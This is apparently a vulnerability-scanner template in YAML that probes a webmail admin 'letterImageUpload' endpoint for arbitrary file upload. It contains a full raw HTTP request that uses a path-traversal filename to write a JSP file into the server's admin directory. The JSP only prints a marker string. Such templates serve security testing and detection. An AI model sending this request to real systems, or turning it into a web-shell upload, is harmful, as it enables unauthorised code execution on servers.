http:
    - matchers:
        - status:
            - 200
          type: status
        - part: body
          type: word
          words:
            - Vulnerable!
      matchers-condition: and
      raw:
        - |
          POST /webadmin/service/openapiservice?func=upload:letterImageUpload HTTP/1.1
          Host: {{Hostname}}
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

          ------WebKitFormBoundary
          Content-Disposition: form-data; name="imageX"

          0
          ------WebKitFormBoundary
          Content-Disposition: form-data; name="imageY"

          0
          ------WebKitFormBoundary
          Content-Disposition: form-data; name="submit"

          提交
          ------WebKitFormBoundary
          Content-Disposition: form-data; name="filename"; filename="../../../../../web/webmailsvr/admin/12.jsp"
          Content-Type: text/plain

          <% out.println("Vulnerable!"); %>
          ------WebKitFormBoundary--
id: letter-image-upload-rce
info:
    author: ProjectDiscoveryAI
    description: |
        This template checks for a vulnerability in the letterImageUpload functionality which allows arbitrary file upload leading to remote code execution.
    name: Letter Image Upload RCE
    severity: high
    tags:
        - file-upload
